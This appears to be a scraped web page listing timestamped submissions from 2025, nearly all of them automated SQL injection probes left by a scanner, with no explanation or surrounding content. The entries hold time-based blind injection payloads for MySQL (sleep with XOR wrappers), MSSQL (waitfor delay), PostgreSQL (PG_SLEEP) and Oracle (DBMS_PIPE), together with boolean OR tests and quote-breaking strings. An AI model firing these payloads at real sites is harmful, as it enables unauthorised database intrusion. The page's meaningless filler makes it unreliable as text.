if(now()=sysdate(),sleep(15),0) Oct. 1, 2025, 8:05 p.m.
555
pHqghUme Oct. 1, 2025, 8:05 p.m.
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
pHqghUme Oct. 1, 2025, 8:05 p.m.
1
pHqghUme Oct. 1, 2025, 8:05 p.m.
1'"
pHqghUme0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z Oct. 1, 2025, 8:05 p.m.
555
pHqghUme Oct. 1, 2025, 8:05 p.m.
1����%2527%2522\'\"
pHqghUme Oct. 1, 2025, 8:05 p.m.
@@I2BaJ
pHqghUme0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z Oct. 1, 2025, 8:05 p.m.
555
pHqghUme-1 waitfor delay '0:0:15' -- Oct. 1, 2025, 8:05 p.m.
555
pHqghUmedA31g3P6'; waitfor delay '0:0:15' -- Oct. 1, 2025, 8:05 p.m.
555
pHqghUmenIoZsR41' OR 380=(SELECT 380 FROM PG_SLEEP(15))-- Oct. 1, 2025, 8:05 p.m.
555
pHqghUme20W4RPly') OR 785=(SELECT 785 FROM PG_SLEEP(15))-- Oct. 1, 2025, 8:05 p.m.
555
pHqghUmeHNKttFqc')) OR 976=(SELECT 976 FROM PG_SLEEP(15))-- Oct. 1, 2025, 8:05 p.m.
555
pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' Oct. 1, 2025, 8:05 p.m.
555
pHqghUme Oct. 1, 2025, 8:05 p.m.
555
pHqghUme'" Oct. 1, 2025, 8:05 p.m.
555
pHqghUme����%2527%2522\'\" Oct. 1, 2025, 8:05 p.m.
555
@@qYhyE Oct. 1, 2025, 8:05 p.m.
555
pHqghUme Oct. 8, 2025, 11:46 p.m.
1
pHqghUme Oct. 8, 2025, 11:46 p.m.
1
pHqghUme Oct. 8, 2025, 11:47 p.m.
1
pHqghUme Oct. 8, 2025, 11:47 p.m.
1
pHqghUme Oct. 8, 2025, 11:47 p.m.
1
pHqghUme Oct. 8, 2025, 11:48 p.m.
555
pHqghUme Oct. 8, 2025, 11:48 p.m.
1
pHqghUme Oct. 8, 2025, 11:48 p.m.
1
pHqghUme Oct. 8, 2025, 11:48 p.m.
1
pHqghUmexnwrxuKs Oct. 8, 2025, 11:48 p.m.
1
pHqghUme Oct. 8, 2025, 11:48 p.m.
555
pHqghUme Oct. 8, 2025, 11:48 p.m.
1
-1 OR 2+406-406-1=0+0+0+1 -- Oct. 8, 2025, 11:48 p.m.
1
-1 OR 2+827-827-1=0+0+0+1 Oct. 8, 2025, 11:48 p.m.
1
-1' OR 2+646-646-1=0+0+0+1 -- Oct. 8, 2025, 11:48 p.m.
1
-1' OR 2+193-193-1=0+0+0+1 or '2YeZQInY'=' Oct. 8, 2025, 11:48 p.m.
1
-1" OR 2+638-638-1=0+0+0+1 -- Oct. 8, 2025, 11:48 p.m.
1
pHqghUme Oct. 8, 2025, 11:48 p.m.
555
if(now()=sysdate(),sleep(15),0) Oct. 8, 2025, 11:48 p.m.
1
pHqghUme Oct. 8, 2025, 11:48 p.m.
555oxvzK7aG
pHqghUme0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z Oct. 8, 2025, 11:48 p.m.
1
pHqghUme Oct. 8, 2025, 11:49 p.m.
555
pHqghUme Oct. 8, 2025, 11:49 p.m.
-1 OR 2+481-481-1=0+0+0+1 --
pHqghUme Oct. 8, 2025, 11:49 p.m.
-1 OR 2+334-334-1=0+0+0+1
pHqghUme Oct. 8, 2025, 11:49 p.m.
-1' OR 2+386-386-1=0+0+0+1 --
pHqghUme Oct. 8, 2025, 11:49 p.m.
-1' OR 2+84-84-1=0+0+0+1 or 'h7IdLior'='
pHqghUme Oct. 8, 2025, 11:49 p.m.
-1" OR 2+605-605-1=0+0+0+1 --
pHqghUme0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z Oct. 8, 2025, 11:49 p.m.
1
pHqghUme Oct. 8, 2025, 11:49 p.m.
555*if(now()=sysdate(),sleep(15),0)
pHqghUme Oct. 8, 2025, 11:49 p.m.
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
pHqghUme-1 waitfor delay '0:0:15' -- Oct. 8, 2025, 11:49 p.m.
1
pHqghUme Oct. 8, 2025, 11:49 p.m.
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
pHqghUmeOcfKKFuA'; waitfor delay '0:0:15' -- Oct. 8, 2025, 11:49 p.m.
1
pHqghUme Oct. 8, 2025, 11:49 p.m.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
pHqghUme39N65siu' OR 259=(SELECT 259 FROM PG_SLEEP(15))-- Oct. 8, 2025, 11:49 p.m.
1
pHqghUme Oct. 8, 2025, 11:49 p.m.
555-1; waitfor delay '0:0:15' --
pHqghUmebpTjCm3R') OR 246=(SELECT 246 FROM PG_SLEEP(15))-- Oct. 8, 2025, 11:49 p.m.
1
pHqghUme Oct. 8, 2025, 11:49 p.m.
555-1); waitfor delay '0:0:15' --
pHqghUmeQ6Q5C3q6')) OR 439=(SELECT 439 FROM PG_SLEEP(15))-- Oct. 8, 2025, 11:49 p.m.
1
pHqghUme Oct. 8, 2025, 11:49 p.m.
555-1 waitfor delay '0:0:15' --
pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' Oct. 8, 2025, 11:49 p.m.
1
pHqghUme Oct. 8, 2025, 11:49 p.m.
1
pHqghUme'" Oct. 8, 2025, 11:49 p.m.
1
pHqghUme����%2527%2522\'\" Oct. 8, 2025, 11:49 p.m.
1
@@2Euk6 Oct. 8, 2025, 11:49 p.m.
1
pHqghUme Oct. 8, 2025, 11:49 p.m.
555Q3FYFWys'; waitfor delay '0:0:15' --
pHqghUme Oct. 8, 2025, 11:49 p.m.
1
pHqghUme Oct. 8, 2025, 11:49 p.m.
555-1 OR 274=(SELECT 274 FROM PG_SLEEP(15))--
pHqghUme Oct. 8, 2025, 11:49 p.m.
1
pHqghUme Oct. 8, 2025, 11:49 p.m.
555-1) OR 70=(SELECT 70 FROM PG_SLEEP(15))--
pHqghUme Oct. 8, 2025, 11:49 p.m.
1
pHqghUme Oct. 8, 2025, 11:49 p.m.
555-1)) OR 450=(SELECT 450 FROM PG_SLEEP(15))--
pHqghUme Oct. 8, 2025, 11:49 p.m.
1
pHqghUme Oct. 8, 2025, 11:49 p.m.
555yn1BY21o' OR 960=(SELECT 960 FROM PG_SLEEP(15))--
pHqghUme Oct. 8, 2025, 11:49 p.m.
555osXZvLEH') OR 730=(SELECT 730 FROM PG_SLEEP(15))--
pHqghUme Oct. 8, 2025, 11:50 p.m.
555fjrowVNR')) OR 249=(SELECT 249 FROM PG_SLEEP(15))--
pHqghUme Oct. 8, 2025, 11:50 p.m.
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
pHqghUme Oct. 8, 2025, 11:50 p.m.
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
pHqghUme Oct. 8, 2025, 11:50 p.m.
555
pHqghUme Oct. 8, 2025, 11:50 p.m.
555'"
pHqghUme Oct. 8, 2025, 11:50 p.m.
555����%2527%2522\'\"
pHqghUme Oct. 8, 2025, 11:50 p.m.
@@spyh0
pHqghUme Oct. 8, 2025, 11:50 p.m.
555
pHqghUme Oct. 8, 2025, 11:50 p.m.
555
pHqghUme Oct. 8, 2025, 11:50 p.m.
555
pHqghUme Oct. 8, 2025, 11:50 p.m.
1
pHqghUme Oct. 8, 2025, 11:50 p.m.
1
pHqghUme Oct. 8, 2025, 11:50 p.m.
1
pHqghUme Oct. 8, 2025, 11:50 p.m.
1UhGQPnTz
pHqghUme Oct. 8, 2025, 11:50 p.m.
1
pHqghUme Oct. 8, 2025, 11:50 p.m.
-1 OR 2+827-827-1=0+0+0+1 --
pHqghUme Oct. 8, 2025, 11:50 p.m.
-1 OR 2+651-651-1=0+0+0+1
pHqghUme Oct. 8, 2025, 11:50 p.m.
-1' OR 2+194-194-1=0+0+0+1 --
pHqghUme Oct. 8, 2025, 11:50 p.m.
-1' OR 2+645-645-1=0+0+0+1 or 'lEo8udAG'='
pHqghUme Oct. 8, 2025, 11:50 p.m.
-1" OR 2+804-804-1=0+0+0+1 --
pHqghUme Oct. 8, 2025, 11:50 p.m.
1*if(now()=sysdate(),sleep(15),0)
pHqghUme Oct. 8, 2025, 11:51 p.m.
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
pHqghUme Oct. 8, 2025, 11:51 p.m.
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
pHqghUme Oct. 8, 2025, 11:51 p.m.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
pHqghUme Oct. 8, 2025, 11:51 p.m.
1-1; waitfor delay '0:0:15' --
pHqghUme Oct. 8, 2025, 11:51 p.m.
555
pHqghUme Oct. 8, 2025, 11:51 p.m.
1-1); waitfor delay '0:0:15' --
pHqghUme Oct. 8, 2025, 11:51 p.m.
555
pHqghUme Oct. 8, 2025, 11:51 p.m.
1-1 waitfor delay '0:0:15' --
pHqghUme Oct. 8, 2025, 11:51 p.m.
555
pHqghUme Oct. 8, 2025, 11:51 p.m.
12Wl6HvUK'; waitfor delay '0:0:15' --
pHqghUme Oct. 8, 2025, 11:51 p.m.
555
pHqghUme Oct. 8, 2025, 11:51 p.m.
1-1 OR 901=(SELECT 901 FROM PG_SLEEP(15))--
pHqghUme Oct. 8, 2025, 11:51 p.m.
555
pHqghUme Oct. 8, 2025, 11:51 p.m.
1-1) OR 728=(SELECT 728 FROM PG_SLEEP(15))--
pHqghUme Oct. 8, 2025, 11:51 p.m.
1-1)) OR 623=(SELECT 623 FROM PG_SLEEP(15))--
pHqghUme Oct. 8, 2025, 11:51 p.m.
1AHH1gc07' OR 161=(SELECT 161 FROM PG_SLEEP(15))--
pHqghUme Oct. 8, 2025, 11:51 p.m.
1To3AySIx') OR 228=(SELECT 228 FROM PG_SLEEP(15))--
pHqghUme Oct. 8, 2025, 11:51 p.m.
1L0gTETzN')) OR 405=(SELECT 405 FROM PG_SLEEP(15))--
pHqghUme Oct. 8, 2025, 11:51 p.m.
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
pHqghUme Oct. 8, 2025, 11:51 p.m.
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
pHqghUme Oct. 8, 2025, 11:51 p.m.
1
pHqghUme Oct. 8, 2025, 11:51 p.m.
1'"
pHqghUme Oct. 8, 2025, 11:51 p.m.
1����%2527%2522\'\"
pHqghUme Oct. 8, 2025, 11:51 p.m.
@@qjOcW
pHqghUme Oct. 8, 2025, 11:52 p.m.
555
pHqghUme Oct. 8, 2025, 11:52 p.m.
555
pHqghUme Oct. 8, 2025, 11:52 p.m.
555
pHqghUmeFQzN1Ejt Oct. 8, 2025, 11:52 p.m.
555
pHqghUme Oct. 8, 2025, 11:52 p.m.
555
-1 OR 2+962-962-1=0+0+0+1 -- Oct. 8, 2025, 11:52 p.m.
555
-1 OR 2+149-149-1=0+0+0+1 Oct. 8, 2025, 11:52 p.m.
555
-1' OR 2+109-109-1=0+0+0+1 -- Oct. 8, 2025, 11:52 p.m.
555
-1' OR 2+24-24-1=0+0+0+1 or 'rtcDHD7m'=' Oct. 8, 2025, 11:52 p.m.
555
-1" OR 2+943-943-1=0+0+0+1 -- Oct. 8, 2025, 11:52 p.m.
555
if(now()=sysdate(),sleep(15),0) Oct. 8, 2025, 11:52 p.m.
555
pHqghUme0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z Oct. 8, 2025, 11:52 p.m.
555
pHqghUme0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z Oct. 8, 2025, 11:52 p.m.
555
pHqghUme-1 waitfor delay '0:0:15' -- Oct. 8, 2025, 11:52 p.m.
555
pHqghUmebvUoS42c'; waitfor delay '0:0:15' -- Oct. 8, 2025, 11:52 p.m.
555
pHqghUmesqIuo0TT' OR 94=(SELECT 94 FROM PG_SLEEP(15))-- Oct. 8, 2025, 11:52 p.m.
555
pHqghUmejrtY1mMa') OR 657=(SELECT 657 FROM PG_SLEEP(15))-- Oct. 8, 2025, 11:52 p.m.
555
pHqghUmeMCuTgj0q')) OR 914=(SELECT 914 FROM PG_SLEEP(15))-- Oct. 8, 2025, 11:52 p.m.
555
pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' Oct. 8, 2025, 11:52 p.m.
555
pHqghUme Oct. 8, 2025, 11:52 p.m.
555
pHqghUme'" Oct. 8, 2025, 11:52 p.m.
555
pHqghUme����%2527%2522\'\" Oct. 8, 2025, 11:52 p.m.
555
@@MwkYD Oct. 8, 2025, 11:52 p.m.
555
pHqghUme Sept. 20, 2025, 8:57 p.m.
1